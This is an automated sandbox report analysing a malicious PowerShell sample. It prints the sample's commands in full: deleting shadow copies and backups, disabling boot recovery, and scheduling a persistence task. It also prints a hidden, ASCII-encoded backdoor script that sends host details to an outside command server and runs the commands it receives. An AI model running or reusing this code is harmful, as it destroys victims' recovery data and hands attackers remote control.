Analysis
-
max time kernel
100s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09/10/2022, 09:36
Static task
static1
Behavioral task
behavioral1
Sample
74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1
Resource
win10v2004-20220812-en
General
-
Target
74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1
-
Size
6KB
-
MD5
ede5c49bec4a648e32a4f52f95fea2db
-
SHA1
641a51392d97a3470021eeb76606fc4035441a6c
-
SHA256
74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba
-
SHA512
dcac1452c4dfcff8a76b863a90dd8034d18a6b649c2188738beae831ec4ad823d92bdde433cb35851aadfffc521f2ac403fd5b0867610c8ac4984fcca2b239f6
-
SSDEEP
192:4PI7/sZhGh7ZdfI+zu8UPN+u8c6Ha+btyUPuxYWst5bDRh99I:4PI7/KhGdg+z/UPg/JfZPostxDc
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1944 bcdedit.exe 1984 bcdedit.exe -
pid Process 2148 wbadmin.exe -
pid Process 1740 wbadmin.exe -
pid Process 4276 wbadmin.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4808 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 316 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3132 powershell.exe 3132 powershell.exe 3740 powershell.exe 3740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 3132 powershell.exe Token: SeBackupPrivilege 3696 wbengine.exe Token: SeRestorePrivilege 3696 wbengine.exe Token: SeSecurityPrivilege 3696 wbengine.exe Token: SeBackupPrivilege 2208 vssvc.exe Token: SeRestorePrivilege 2208 vssvc.exe Token: SeAuditPrivilege 2208 vssvc.exe Token: SeDebugPrivilege 3740 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3132 wrote to memory of 4808 3132 powershell.exe 85 PID 3132 wrote to memory of 4808 3132 powershell.exe 85 PID 3132 wrote to memory of 1944 3132 powershell.exe 86 PID 3132 wrote to memory of 1944 3132 powershell.exe 86 PID 3132 wrote to memory of 1984 3132 powershell.exe 87 PID 3132 wrote to memory of 1984 3132 powershell.exe 87 PID 3132 wrote to memory of 1740 3132 powershell.exe 88 PID 3132 wrote to memory of 1740 3132 powershell.exe 88 PID 3132 wrote to memory of 2148 3132 powershell.exe 92 PID 3132 wrote to memory of 2148 3132 powershell.exe 92 PID 3132 wrote to memory of 4276 3132 powershell.exe 93 PID 3132 wrote to memory of 4276 3132 powershell.exe 93 PID 3132 wrote to memory of 316 3132 powershell.exe 94 PID 3132 wrote to memory of 316 3132 powershell.exe 94 PID 3132 wrote to memory of 3244 3132 powershell.exe 97 PID 3132 wrote to memory of 3244 3132 powershell.exe 97 PID 3132 wrote to memory of 3740 3132 powershell.exe 98 PID 3132 wrote to memory of 3740 3132 powershell.exe 98
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 19 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs2⤵
- Creates scheduled task(s)
PID:4808
-
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set yifydxwzg bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1944
-
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set yifydxwzg recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1984
-
-
C:\Windows\system32\wbadmin.exe"C:\Windows\system32\wbadmin.exe" delete catalog -quiet2⤵
- Deletes backup catalog
PID:1740
-
-
C:\Windows\system32\wbadmin.exe"C:\Windows\system32\wbadmin.exe" delete systemstatebackup2⤵
- Deletes System State backups
- Drops file in Windows directory
PID:2148
-
-
C:\Windows\system32\wbadmin.exe"C:\Windows\system32\wbadmin.exe" delete backup2⤵
- Deletes system backups
- Drops file in Windows directory
PID:4276
-
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:316
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" %PUBLIC%\Libraries\WindowsIndexingService.vbs2⤵PID:3244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c =[string][System.Text.Encoding]::ASCII.GetString 36 100 97 99 121 122 122 97 118 105 104 32 61 32 36 101 110 118 58 80 85 66 76 73 67 32 43 32 34 92 76 105 98 114 97 114 105 101 115 34 10 105 102 32 40 45 110 111 116 32 40 84 101 115 116 45 80 97 116 104 32 36 100 97 99 121 122 122 97 118 105 104 41 41 32 123 32 109 100 32 36 100 97 99 121 122 122 97 118 105 104 59 32 125 10 36 104 118 121 102 97 118 100 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 118 98 115 34 59 10 36 119 119 115 100 100 100 97 99 121 99 32 32 61 32 34 49 48 48 49 46 51 34 59 10 36 98 116 101 100 115 118 97 116 102 97 32 61 32 36 101 110 118 58 116 101 109 112 32 43 32 34 92 65 70 88 53 48 48 53 56 46 116 109 112 34 59 10 36 122 102 116 97 115 106 101 32 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 54 52 46 100 98 34 59 10 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 10 36 115 102 118 104 120 117 100 101 32 61 32 34 119 34 59 10 10 102 117 110 99 116 105 111 110 32 105 97 109 119 111 114 107 50 123 32 115 99 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 86 97 108 117 101 32 36 40 71 101 116 45 68 97 116 101 41 59 32 125 59 10 102 117 110 99 116 105 111 110 32 100 121 97 120 117 98 116 105 106 118 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 36 119 103 104 102 117 99 101 102 117 32 45 109 97 116 99 104 32 39 79 117 116 79 102 77 101 109 111 114 121 69 120 99 101 112 116 105 111 110 39 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 59 10 125 10 10 102 117 110 99 116 105 111 110 32 115 101 110 100 112 111 115 116 50 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 32 61 32 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 67 114 101 100 101 110 116 105 97 108 115 32 61 32 91 83 121 115 116 101 109 46 78 101 116 46 67 114 101 100 101 110 116 105 97 108 67 97 99 104 101 93 58 58 68 101 102 97 117 108 116 67 114 101 100 101 110 116 105 97 108 115 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 72 101 97 100 101 114 115 46 65 100 100 40 34 67 111 110 116 101 110 116 45 84 121 112 101 34 44 32 34 97 112 112 108 105 99 97 116 105 111 110 47 120 45 119 119 119 45 102 111 114 109 45 117 114 108 101 110 99 111 100 101 100 34 41 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 69 110 99 111 100 105 110 103 32 61 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 59 10 32 32 116 114 121 123 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 34 32 43 32 36 119 103 104 102 117 99 101 102 117 32 41 32 41 32 41 32 41 59 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 91 115 116 114 105 110 103 93 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 65 83 67 73 73 46 71 101 116 83 116 114 105 110 103 40 91 83 121 115 116 101 109 46 67 111 110 118 101 114 116 93 58 58 70 114 111 109 66 97 115 101 54 52 83 116 114 105 110 103 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 59 10 32 32 32 32 105 102 40 32 33 36 115 102 118 104 120 117 100 101 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 10 32 32 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 32 45 101 113 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 41 123 10 32 32 32 32 32 32 114 101 116 117 114 110 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 49 54 44 36 100 104 104 119 121 120 118 121 46 108 101 110 103 116 104 45 49 54 41 32 59 10 32 32 32 32 125 101 108 115 101 123 10 32 32 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 32 32 115 101 110 100 112 111 115 116 50 32 40 34 101 114 114 111 114 61 34 32 43 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 32 41 59 10 32 32 32 32 125 10 32 32 125 99 97 116 99 104 123 10 32 32 32 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 10 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 101 114 114 111 114 61 115 101 110 100 112 111 115 116 50 58 34 32 43 32 36 109 121 117 114 108 112 111 115 116 43 34 58 34 43 36 100 104 104 119 121 120 118 121 32 43 34 58 34 43 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 32 41 32 41 32 41 32 41 59 10 32 32 125 59 10 32 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 122 100 105 102 102 118 97 104 115 40 32 36 121 121 102 104 103 104 119 115 32 41 123 10 32 32 36 106 119 117 115 103 104 100 32 61 32 34 104 116 116 112 58 47 47 107 97 109 97 46 109 105 97 108 101 101 107 97 46 99 111 109 47 34 59 10 32 32 34 104 101 101 34 44 34 120 117 49 34 44 34 104 115 48 34 44 34 106 100 53 34 44 34 109 113 102 34 32 124 32 37 123 32 36 106 119 117 115 103 104 100 32 43 61 32 34 44 34 43 34 104 116 116 112 58 47 47 34 43 32 40 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 95 43 32 36 40 71 101 116 45 68 97 116 101 32 45 85 70 111 114 109 97 116 32 34 37 121 37 109 37 86 34 41 32 41 32 41 46 116 111 76 111 119 101 114 40 41 32 41 32 43 34 46 116 111 112 47 34 59 32 125 59 10 32 32 36 106 119 117 115 103 104 100 46 115 112 108 105 116 40 34 44 34 41 32 124 32 37 123 10 32 32 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 10 32 32 32 32 32 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 95 59 10 32 32 32 32 32 32 105 102 40 32 33 40 115 101 110 100 112 111 115 116 50 32 40 36 121 121 102 104 103 104 119 115 32 43 32 34 38 100 111 109 101 110 61 36 109 121 117 114 108 112 111 115 116 34 32 41 41 32 41 123 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 32 125 59 10 32 32 32 32 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 53 59 10 32 32 32 32 125 10 32 32 125 59 10 32 32 105 102 40 32 36 121 121 102 104 103 104 119 115 32 45 109 97 116 99 104 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 34 32 41 123 10 32 32 32 32 114 101 116 117 114 110 32 34 111 107 34 59 10 32 32 125 101 108 115 101 123 10 32 32 32 32 114 101 116 117 114 110 32 36 109 121 117 114 108 112 111 115 116 59 10 32 32 125 32 10 125 59 10 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 41 123 10 32 32 105 102 32 40 32 40 32 40 32 78 69 87 45 84 73 77 69 83 80 65 78 32 45 83 116 97 114 116 32 40 40 71 101 116 45 67 104 105 108 100 73 116 101 109 32 36 98 116 101 100 115 118 97 116 102 97 32 41 46 67 114 101 97 116 105 111 110 84 105 109 101 41 32 45 69 110 100 32 40 71 101 116 45 68 97 116 101 41 41 46 77 105 110 117 116 101 115 32 41 32 45 103 116 32 49 53 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 116 114 121 123 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 101 108 115 101 123 32 101 120 105 116 59 32 125 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 119 98 117 118 104 121 118 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 105 102 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 32 32 115 99 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 86 97 108 117 101 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 44 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 32 45 114 101 112 108 97 99 101 32 39 45 39 44 39 39 32 41 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 32 45 106 111 105 110 32 39 44 39 32 41 32 45 70 111 114 99 101 59 32 32 10 32 32 32 32 103 105 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 32 124 32 32 37 123 32 36 95 46 65 116 116 114 105 98 117 116 101 115 32 61 32 34 72 105 100 100 101 110 34 32 125 59 10 32 32 32 32 116 114 121 123 10 32 32 32 32 32 32 36 116 101 103 98 101 121 120 102 32 61 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 46 108 110 107 39 59 10 32 32 32 32 32 32 105 102 40 32 45 110 111 116 32 40 32 84 101 115 116 45 80 97 116 104 32 36 116 101 103 98 101 121 120 102 32 41 32 41 123 10 32 32 32 32 32 32 32 32 36 122 106 98 98 100 99 105 100 100 119 32 61 32 78 101 119 45 79 98 106 101 99 116 32 45 67 111 109 79 98 106 101 99 116 32 40 39 87 83 99 114 105 112 116 46 83 104 101 108 108 39 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 32 61 32 36 122 106 98 98 100 99 105 100 100 119 46 67 114 101 97 116 101 83 104 111 114 116 99 117 116 40 32 36 116 101 103 98 101 121 120 102 32 32 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 84 97 114 103 101 116 80 97 116 104 32 61 32 36 104 118 121 102 97 118 100 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 111 114 107 105 110 103 68 105 114 101 99 116 111 114 121 32 61 32 36 100 97 99 121 122 122 97 118 105 104 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 105 110 100 111 119 83 116 121 108 101 32 61 32 49 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 68 101 115 99 114 105 112 116 105 111 110 32 61 32 39 87 105 110 100 111 119 115 32 65 112 112 108 105 99 97 116 105 111 110 32 83 101 114 118 105 99 101 39 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 83 97 118 101 40 41 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 32 32 32 32 36 97 102 105 101 104 104 97 32 61 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 38 115 115 105 100 61 36 101 119 106 97 121 120 97 101 119 117 38 111 115 61 34 43 40 91 115 116 114 105 110 103 93 36 80 83 86 101 114 115 105 111 110 84 97 98 108 101 46 66 117 105 108 100 86 101 114 115 105 111 110 41 43 34 38 112 115 118 101 114 61 34 43 40 32 40 32 40 71 101 116 45 72 111 115 116 41 46 86 101 114 115 105 111 110 32 41 46 77 97 106 111 114 32 41 43 32 34 38 99 111 109 112 95 110 97 109 101 61 34 32 43 32 40 40 71 101 116 45 87 109 105 79 98 106 101 99 116 32 45 99 108 97 115 115 32 87 105 110 51 50 95 67 111 109 112 117 116 101 114 83 121 115 116 101 109 32 45 80 114 111 112 101 114 116 121 32 78 97 109 101 41 46 78 97 109 101 46 116 114 105 109 40 41 32 41 59 10 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 32 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 44 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 106 115 34 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 32 73 110 100 101 120 105 110 103 32 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 32 41 123 10 32 32 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 10 32 32 32 32 36 116 116 100 105 104 120 99 121 98 101 32 61 32 122 100 105 102 102 118 97 104 115 32 36 97 102 105 101 104 104 97 59 10 32 32 32 32 105 102 40 32 36 116 116 100 105 104 120 99 121 98 101 32 45 110 101 32 34 111 107 34 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 101 120 105 116 59 10 32 32 32 32 125 10 32 32 125 10 32 32 114 101 116 117 114 110 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 125 10 36 118 100 97 105 116 104 102 32 61 32 40 115 99 104 116 97 115 107 115 46 101 120 101 32 47 99 114 101 97 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 34 32 47 115 99 32 68 65 73 76 89 32 47 115 116 32 48 48 58 48 48 32 47 102 32 47 82 73 32 49 57 32 47 100 117 32 50 51 58 53 57 32 47 84 82 32 36 104 118 121 102 97 118 100 41 59 32 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 41 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 102 97 108 115 101 59 10 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 46 108 101 110 103 116 104 32 45 110 101 32 49 54 32 32 41 123 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 32 125 10 125 101 108 115 101 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 10 125 10 36 109 121 117 114 108 112 111 115 116 32 61 32 122 100 105 102 102 118 97 104 115 59 10 119 104 105 108 101 40 32 36 115 102 118 104 120 117 100 101 32 41 123 10 32 32 105 97 109 119 111 114 107 50 59 10 32 32 116 114 121 123 10 32 32 32 32 105 102 40 32 36 115 102 118 104 120 117 100 101 32 45 97 110 100 32 40 36 115 102 118 104 120 117 100 101 46 108 101 110 103 116 104 32 45 103 116 32 51 48 41 32 32 41 123 10 32 32 32 32 32 32 105 101 120 32 36 115 102 118 104 120 117 100 101 59 10 32 32 32 32 125 59 10 32 32 125 99 97 116 99 104 123 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 32 125 59 10 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 50 56 48 59 10 32 32 36 115 102 118 104 120 117 100 101 32 61 32 115 101 110 100 112 111 115 116 50 59 10 125 59 10 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 102⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4708
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3892
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5e5bfec1063a497048fffb231a0621403
SHA197cf6a89f237f43b9c22e3e081f7d45924d435ba
SHA256325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f
SHA512e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e